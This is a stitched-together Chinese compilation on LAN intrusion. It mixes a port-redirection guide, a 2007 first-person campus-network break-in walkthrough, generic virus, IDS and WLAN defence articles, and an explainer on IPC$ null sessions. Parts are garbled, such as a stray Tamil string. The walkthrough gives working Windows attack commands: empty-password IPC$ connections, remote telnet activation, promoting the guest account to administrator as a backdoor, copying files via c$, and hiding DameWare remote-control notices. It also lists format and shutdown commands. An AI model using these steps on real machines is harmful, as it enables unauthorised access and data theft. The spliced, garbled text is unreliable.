局域网入侵问题
怎样入侵局域网

分析内部网络的漏洞后,就利用“端口重定向”来பைடு நூலகம்侵。
所谓端口转向功能,就是将对某个端口的请求转向到其他电脑上,假设某一分机的内部IP是192.168.0.2,经过流光的扫描知道Administrator的口令为123,并且开放Telnet和3389服务,主机的外部IP是202.99.1.1。在202.99.1.1上运行了一个端口转向的程序(Fpipe.exe),经过参数设置,这个程序先在202.99.1.1开,23端口并监听,当有请求连接时,创建一个socket,通过22端口把请求发送到192.168.0.2的23端口去.所以,当有人向主机202.99.1.1的23端口发送Telnet连接的请求时,端口转向程序就发生作用了,马上将这个请求转向到那台192.168.0.2分机上的23端口去,因为192.168.0.2开放Telnet服务,所以这台分机会马上作出回应,这样连接就会产生了,也就是说攻击者已经入侵到内网的分机。
例如,有这样一个局域网服务器的IP为202.99.1.1,其内部有一些分机,内部分机的IP我们暂不知道(不过通常为192.168.0.x)。
首先,假如我们已经取得202.99.1.1的Administrator的密码,通过IPCS打开Telnet服务并Telnet上202.99.1.1。执行ipconfig命令,得出其两块网卡的IP分别为192.168,0.1和202.99.1.1,那么其他的机器的IP应该就在192.168.0.X这个网段。在202.99.1.1上安装流光4.7的sensor(其实x-scan也可以,而且x-scan能够扫描的漏洞比流光多。不过操作起来就有点麻烦,你要先上传X-scan到主机,再telnet上去利用x-scan的命令行模式扫描,所以这个telnet终端不能断开,也就是说你要等到x—scan扫描完了才能断开telnet,否则就会中断扫描),主要是寻找内部网的漏洞。根据我的经验,内部网的机器的安全性极差!administrator的密码很弱智,多数为空或123、123456等!而且有许多分机的guest账号都是Administrators组的成员,总之就是漏洞重重!
局域网病毒入侵原理及防范方法

计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,下面将为大家介绍有关局域网病毒的入侵原理及防范方法。
一、局域网病毒入侵原理及现象一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。
计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。
具体地说,其传播方式有以下几种。
(1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播;(2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器;(3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中(4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。
而对于无盘工作站来说,由于其并非真的"无盘"(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。
由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。
(1)感染速度快在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。
根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。
(2)扩散面广由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。
(3)传播的形式复杂多样计算机病毒在网络上一般是通过"工作站"到"服务器"到"工作站"的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。
局域网电脑入侵

来学校没事,看了些局域网电脑入侵的资料,加上自己实战经验(绝对没搞破坏,也没上传那些木马,这是一点的道德问题),总结出两种常用的入侵途径:1.用139端口(IPC$)入侵(我不常用,好像很难成功)一.先用"NTscan变态扫描器"扫描局域网某一网段(我这里只要是校园网内的就行)的IP,使用WMI扫描,端口139,得到一些弱口令(用户名为administrator,密码为空)的IP,使用cmd.exe,用net use \\IP\IPC$ "" /user:administrator,但是绝大部分电脑都提示说:"发生系统错误53。
找不到网络路径。
"我想可能是被对方防火墙拦截了.只有极个别能连上.net use \\218.168.0.1\IPC$ "" /user:administrator 提示“命令成功完成”,建立好了IPC$(远程管理连接) 二.net time \\192.168.0.1 显示远程主机的当前时间,显示时间为05:00at \\192.168.0.1 05:00 telnet 用at命令启动远程主机的telnet服务,但我用了可是没成功(也可用我得电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动,就OK了)telnet 192.168.0.1 telnet上去administrator 键入y后,输入的用户名,密码为空三.net user 查看用户,如:administrator,guest, HelpAssistantnet user guest /active:yes 激活guest用户net user guest *** 更改guest的密码为***net localgroup administrators guest /add 把guest的权限提升为管理员权限,为以后入侵留后门四.net share admin$ net share E$ 开共享,默认都是共享的net share c$ /del 用来关闭共享的net u** *\\192.168.0.1\c$ "" /user:administrator 映射远程主机c$盘到本地x盘,这个我也没成功五使用"远程监控软件dameware"控制这台电脑.六.exit 断开远程主机的连接(没什么用,我都是直接关掉窗口的)2.用23端口(telnet)入侵一.(与上二大同)先用"局域网查看工具V1.60"查看弱口令并开了23端口的,也可以只找到弱口令的主机,然后每个IP都按照电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动的方式开启telnet,再在cmd.exe中输入telnet IP,连不起的会出现"不能打开到主机的连接,在端口23: 连接失败",当然有些是开了23端口,但由于防火墙阻止了.telnet 192.168.0.1 telent上去administrator 输入y后,输入的用户名,密码为空二.(同上三)net user 查看用户:administrator,guest, HelpAssistantnet user guest /active:yes 激活guest用户net user guest **** 更改guest的密码为****net localgroup administrators guest /add 把guest的权限提升为管理员权限三.net share ipc$ net share admin$ net share E$ 开共享,默认都是共享的,ipc$一定要开,以便下一步net use \\192.168.0.1\IPC$ "" /user:administrator 建立IPC$(远程管理连接)四.使用"远程监控软件dameware"控制这台电脑.附:1.共享信息net share e=e: 将远程主机的E盘共享, 访问时只需输入\\192.168.136.\enet share c=c:\winnt\system 共享s ystem文件夹net share e /del 关闭E盘共享2.telnet命令(DOS命令),在网上搜,太多了dir d:\ 查看D盘 dir d:\PROGRA~1\ 即program file文件夹,取前6个字母加上~符号,后面再加上数字1shutdown -s -t 60(60秒倒记时关机)opy复制文件DEL删除MKDIR创建目录format格式化硬盘IPCONFIG /ALL查看所有IP信息 NETSTA T -AN查看端口3.ipc$常用命令,也在网上搜,也很多copy c:\x.exe \\192.168.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内,这个我没弄成功copy \\192.168.0.1\c$\x.exe c:\ 将远程主机上的文件复制到自己的机器里4.软件信息一.远程开启telent服务的软件:"Recton--D贺免杀专用版",这个软件很好用,只需要远程主机IP和用户名密码,就可开telent,只可惜要被我金山毒霸杀掉,每次用它都要将实时防毒关掉.二."远程监控软件dameware",这个软件很好,可以控制对方电脑就像在自己机子上操作一样,十分方便,具体教程网上去找,美中不足的是,每次连接上远程主机后,它都要在对方电脑上弹出连接提示窗口,还发出"当"的一声,除非对方又聋又瞎,不然都会被发现.(虽然我已把Additional Settings下的Enable SysTray Icon,和Notify Dialog下的Notify on Connection钩掉了都这样),所以着问题解决不了,这个软件就不要轻易使用.三.端口扫描软件,这就太多了,网上一搜一大堆,也不晓得哪些好,我这里有"s扫描器","NTscan变态扫描器","流光5.0","hscan120扫描器"等注:不要用来搞破坏哈.仅供娱乐!想上传木马的自己到网上找资料.乱世狂人2007.3.4首发地址:/164701150/blog/7。
网络入侵防护的技术难点及解决方案(七)

随着互联网的普及和信息化的进程,网络安全问题日益凸显。
网络入侵成为了一种常见的安全威胁,给企业和个人的信息安全带来了严重威胁。
网络入侵指的是黑客通过各种手段进入网络系统,窃取信息、破坏系统等行为,给网络安全带来了巨大的挑战。
在这个背景下,网络入侵防护的技术难点和解决方案备受关注。
一、技术难点网络入侵防护所面临的技术难点主要包括:首先是网络攻击手段的多样性和复杂性。
网络入侵的手段多种多样,包括但不限于DDoS攻击、SQL注入、XSS跨站脚本攻击等,攻击手段不断更新和演变,给防护工作带来了巨大的挑战;其次是网络入侵检测的难度。
黑客们在进行网络入侵时会尽可能地隐藏自己的行踪,使用各种手段进行隐蔽攻击,使得入侵检测变得更加困难;另外,网络入侵的实时性也是一个技术难点。
网络入侵可能随时发生,需要实时监控和防护,这对技术和人员的要求都很高。
二、解决方案为了解决网络入侵防护的技术难点,人们提出了一系列解决方案。
首先是加强网络安全意识和教育。
网络安全意识的普及和提升对于网络入侵防护至关重要,只有当每个员工都对网络安全有足够的认识,并且能够主动遵守网络安全规定和措施时,企业的网络安全才能够得到有效的保障;其次是加强网络安全技术的研发和创新。
随着科技的不断发展,网络安全技术也在不断更新,各种新型的网络安全技术层出不穷,如基于人工智能的网络入侵检测技术、区块链技术在网络安全方面的应用等,这些新技术的研发和创新对于提高网络入侵防护的效果至关重要;另外,加强网络安全法律法规的制定和执行也是解决网络入侵防护问题的重要方面。
只有当国家和政府能够出台更加完善的网络安全法律法规,并且能够对违法行为进行严厉打击,才能够有效地遏制网络入侵行为。
三、未来展望随着技术的不断发展和创新,网络入侵防护的技术难点也将会得到有效的解决。
未来,我们有理由相信,网络入侵防护技术将会更加成熟和完善,网络入侵的危害也将会得到更好地控制。
然而,我们也要意识到,网络入侵防护是一个持续的过程,只有不断学习和掌握最新的网络安全技术,才能够更好地保障网络安全。
无线局域网(WLAN)的安全性与性能优化

无线局域网(WLAN)的安全性与性能优化无线局域网(WLAN)是指通过无线通信技术实现的局域网,它已经成为人们日常生活中随处可见的一种网络连接方式。
然而,随着无线互联网的普及和使用规模的扩大,WLAN的安全性问题和网络性能优化成为人们关注的焦点。
本文将探讨WLAN的安全性和性能优化问题,并提出一些有效的解决办法。
一、WLAN的安全性问题1.1 无线信号窃听WLAN的无线信号可以穿墙传输,在信号覆盖范围外,他人也可以窃听到无线网络传输的数据。
这种无线信号窃听行为可能导致个人隐私泄露,甚至造成重要信息的泄露。
针对无线信号窃听问题,我们可以采取以下措施:- 使用加密技术:将WLAN的数据流进行加密,如WEP、WPA或WPA2等加密协议,以保护数据的安全性。
- 增加信号覆盖范围:通过合理布置无线路由器和增加信号增益,可以将WLAN的信号范围限定在需要的区域内,防止他人窃听。
1.2 无线网络入侵WLAN的无线网络对外界是开放的,不像有线网络那样需要物理接触才能进行攻击。
黑客可以通过一些手段入侵WLAN,并获取敏感信息或者进行恶意攻击。
针对无线网络入侵问题,我们可以采取以下措施:- 使用强密码:为WLAN设置一个强密码,密码越复杂越难破解,可以提高无线网络的安全性。
- 使用防火墙:在WLAN中配置防火墙,可以过滤掉一些潜在的入侵行为,减少黑客攻击的风险。
二、WLAN的性能优化2.1 信号强度优化WLAN信号强度直接影响着网络性能的稳定性和传输速度。
如果信号过弱,网络连接不稳定,可能会导致无法正常访问互联网,或者传输速度缓慢。
针对信号强度不足的问题,我们可以采取以下措施:- 优化无线路由器的位置:将路由器放置在合适的位置,避免遮挡和干扰,以提供更好的信号强度。
- 使用信号扩展器:在WLAN中添加信号扩展器,可以增加信号的传输范围和信号强度,提高网络性能。
2.2 频率选择优化WLAN使用的频率选择对网络性能也有一定的影响。
网络攻击与入侵检测系统的常见问题和解决方法

网络攻击与入侵检测系统的常见问题和解决方法网络攻击和入侵行为日益增多,对于企业和个人用户的网络安全构成了严重威胁。
为了保护网络系统的安全,许多组织都采用了入侵检测系统来监测和防止潜在的攻击。
然而,网络攻击与入侵检测系统也面临着一些常见的问题。
本文将讨论这些问题,并提供解决方法。
常见问题一:误报和漏报现象误报是指入侵检测系统错误地识别合法活动为潜在的攻击行为,而漏报则是指入侵检测系统未能及时检测到实际的攻击行为。
误报和漏报现象使得入侵检测系统难以正确判断网络安全状况,给用户带来了不必要的困扰。
解决方法一:优化规则和策略入侵检测系统的规则和策略需要经常优化和更新,以适应不断变化的网络攻击技术。
通过减少误报和漏报的发生,提高入侵检测系统的准确性和可靠性。
此外,引入机器学习和人工智能等先进技术,可以进一步提高系统的检测效果。
解决方法二:多种检测技术的综合运用入侵检测系统应当采用多种不同的检测技术,以提高系统的覆盖率和多样性。
传统的签名检测、行为分析和异常检测等技术可以相互结合,形成综合的入侵检测能力。
常见问题二:资源占用和性能问题入侵检测系统需要监测和分析大量的网络流量和日志信息,这导致系统需要消耗大量的计算和存储资源。
如果系统设计不合理或者运维不当,可能会导致系统性能下降,影响正常的网络使用。
解决方法一:优化系统架构和配置合理的系统架构和配置可以提高入侵检测系统的性能和可扩展性。
例如,可以使用分布式架构和负载均衡等技术,将工作负载均匀地分布到多台服务器上,提高系统的处理能力。
解决方法二:使用高效的数据压缩和存储技术网络流量和日志信息的存储是入侵检测系统中的重要环节。
采用高效的数据压缩和存储技术可以减少存储空间的占用,提高系统的性能。
同时,合理设置数据保留周期,及时清理过期数据,也可以释放存储资源。
常见问题三:对新型攻击行为的识别问题随着网络攻击技术的不断演进,传统的入侵检测系统可能无法及时识别新型的攻击行为。
局域网内部入侵怎么防止

局域网内部入侵怎么防止局域网的特点是:距离短、延迟小、数据速率高、传输可靠,那么你知道局域网内部入侵怎么防止吗?下面是店铺整理的一些关于局域网内部入侵怎么防止的相关资料,供你参考。
局域网内部入侵1、防范共享入侵比如,在某局域网中,服务器装有Win2000 Server系统且采用NTFS分区,客户机计算机分别为Workl、Work2……WorkN,并装有Win98或Win2000 Pro系统。
假如其中一台客户机的用户名为YD_xlpos,密码为Ei(9,已经登录到域domain,则它可使用默认共享方式入侵服务器:在该客户机的网络邻居地址栏中输入\serveradmin$,便可进入Win2000的系统目录Win NT,此时该用户可以删除文件。
若再输入\serverd$,即可进入服务器上的D盘,此时该客户机用户已经具备服务器的管理员权限,这是相当危险的。
居心叵测的人可以通过新建Winstart.bat或者Wininit.ini文件,并在其中加入格式化C盘的语句,使系统丢失所有C盘文件; 或是在服务器的启动项中加入现在任何流行木马的启动程序,后果也不堪设想。
Win2000采用默认共享方式以便远程维护,但同样给了黑客可乘之机。
打开注册表编辑器,定位到HKEY_L0CAl_MACHINE SYSTEMCurrent Control SetServiceslanmanserver,若系统为Win2000 Pro,则新建Autosharewks的DWORD值,并设键值为0;若系统为Win2000 Server,则新建Autoshareserver的DWORD 值,并设键值为0。
重新启动计算机后默认共享便不会再出现。
不过危险并没有消除,装有Win2000平台的客户机还可以通过IPS$的空连接入侵服务器。
客户机用户可以先用端口扫描软件X-Scan 填入服务器的IP,在扫描模块里选择sqlserver弱口令和nt-server弱口令,当得到nt-server弱口令后,用户来建立空连接,然后激活Guest,并添加管理员权限,安装后门(如netcat)后就可以进行远程控制。
局域网面临的攻击和安全防御对策

局域网面临的攻击和安全防御对策随着局域网的普及和应用,网络安全问题也日益凸显。
局域网面临的攻击愈演愈烈,防御难度也越来越大。
本文将从局域网面临的攻击以及安全防御对策两个方面进行分析。
一、局域网面临的攻击1.网络钓鱼攻击网络钓鱼攻击是指攻击者通过伪装成某些值得信任的实体的方式,欺骗用户输入敏感信息,实现非法获取其账号密码等信息的行为。
攻击者在邮件、短信等通讯工具中发送虚假网页链接,当用户点击后,会进入一个虚假的网站,要求用户填写一些敏感信息,造成数据泄露。
2.木马病毒攻击木马病毒指一种通过给用户发邮件、插入网页等形式,将恶意程序植入电脑内部,盗取信息或实施其他危险行为的一种计算机病毒。
一旦在局域网内出现此类病毒攻击,将会导致重要数据泄露,甚至直接导致系统瘫痪。
3.蠕虫病毒攻击蠕虫病毒属于一种自我复制的计算机程序,具有极强的扩散能力。
一旦在局域网内出现,将会导致网络系统的不稳定,甚至瘫痪。
二、安全防御对策1.提高员工安全意识钼来攻击往往是通过人的错误行为入侵局域网的。
因此,提高员工的安全意识,明确员工对计算机安全的责任,能有效预防网络攻击。
2.加强访问控制加强访问控制,建立网络接入策略,对外部的访问进行限制和审计控制。
3.病毒防护软件及时更新和升级病毒防护软件,需要让病毒防护软件实时监控全局,并进行自动检测和处理。
此外,需要对所有进入局域网的电脑进行检测和清理,保证整个局域网的安全防御。
4.加强网络安全培训加强网络安全培训,向企业内所有人员进行网络安全意识的宣传和培训,使员工对网络安全有清晰的认识,提高整个团队的安全素质。
总之,网络安全问题不容忽视,在局域网应用中要加强安全防御措施,能保障整个局域网的安全,为企业保驾护航。
当然,还需要和其他企业和机构共同推动网络安全的建设,才能确保整个互联网环境的安全性。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
局域网入侵问题悬赏分:10 - 解决时间:2007-9-6 14:01家里有两台电脑,我按网上输入C:\>net use \\192.168.0.1\IPC$ "密码" /user:"用户名" 为什么会提示不是内部或外部命令,也不是可运行的程序呢?我输入net use \\192.168.0.1\ipc$,提示发生错误64,指定的网络名不再有用我是菜鸟,求大家教我解决入侵问题,谢谢大家!提问者: pengys0 - 试用期一级最佳答案一摘要二什么是ipc$三什么是空会话四空会话可以做什么五 ipc$所使用的端口六 ipc管道在hack攻击中的意义七 ipc$连接失败的常见原因八复制文件失败的原因九关于at命令和xp对ipc$的限制十如何打开目标的IPC$共享以及其他共享十一一些需要shell才能完成的命令十二入侵中可能会用到的命令十三对比过去和现今的ipc$入侵十四如何防范ipc$入侵十五 ipc$入侵问答精选一摘要注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列。
二什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。
NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。
所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。
那么什么是空会话呢?三什么是空会话在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建立;2)服务器产生一个随机的64位数(实现挑战)传送回客户;3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结果返回到服务器(实现响应);4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。
如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。
当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。
客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:EveryoneNetwork在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。
那么建立空会话到底可以作什么呢?四空会话可以做什么对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone 权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。
从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的,成功的导出用户列表大大增加了猜解的成功率,仅从这一点,足以说明空会话所带来的安全隐患,因此说空会话毫无用处的说法是不正确的。
以下是空会话中能够使用的一些具体命令:1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)命令:net use \\ip\ipc$ "" /user:""注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源命令:net view \\ip解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 \\*.*.*.*的共享资源资源共享名类型用途注释-----------------------------------------------------------NETLOGON Disk Logon server shareSYSVOL Disk Logon server share命令成功完成。
3 查看远程主机的当前时间命令: net time \\ip解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)命令:nbtstat -A ip用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:Node IpAddress: [*.*.*.*] Scope Id: []NetBIOS Remote Machine Name TableName Type Status---------------------------------------------SERVER <00> UNIQUE RegisteredOYAMANISHI-H <00> GROUP RegisteredOYAMANISHI-H <1C> GROUP RegisteredSERVER <20> UNIQUE RegisteredOYAMANISHI-H <1B> UNIQUE RegisteredOYAMANISHI-H <1E> GROUP RegisteredSERVER <03> UNIQUE RegisteredOYAMANISHI-H <1D> UNIQUE Registered..__MSBROWSE__.<01> GROUP RegisteredINet~Services <1C> GROUP RegisteredIS~SERVER......<00> UNIQUE RegisteredMAC Address = 00-50-8B-9A-2D-37以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。
好了,那么下面我们就来看看ipc$所使用的端口是什么?五 ipc$所使用的端口首先我们来了解一些基础知识:1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP 协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB 除了基于NBT实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:对于win2000客户端(发起端)来说:1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。
对于win2000服务器端来说:1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);2 如果禁止NBT,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。
显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。
六 ipc管道在hack攻击中的意义ipc管道本来是微软为了方便管理员进行远程管理而设计的,但在入侵者看来,开放ipc管道的主机似乎更容易得手。
通过ipc管道,我们可以远程调用一些系统函数(大多通过工具实现,但需要相应的权限),这往往是入侵成败的关键。
如果不考虑这些,仅从传送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。
当然,我们也不能忽视权限在ipc管道中扮演的重要角色,想必你一定品尝过空会话的尴尬,没有权限,开启管道我们也无可奈何。
但入侵者一旦获得了管理员的权限,那么ipc管道这把双刃剑将显示出它狰狞的一面。
七 ipc$连接失败的常见原因以下是一些常见的导致ipc$连接失败的原因:1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL 函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这样,如果响应方关闭了ipc$共享,将不能建立连接;3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络链结和通讯,没有它发起方无法发起连接请求;4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起ipc$连接;5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;7 连接发起方未打开139,445端口;8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样的错误提示(显然空会话排除这种错误);9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。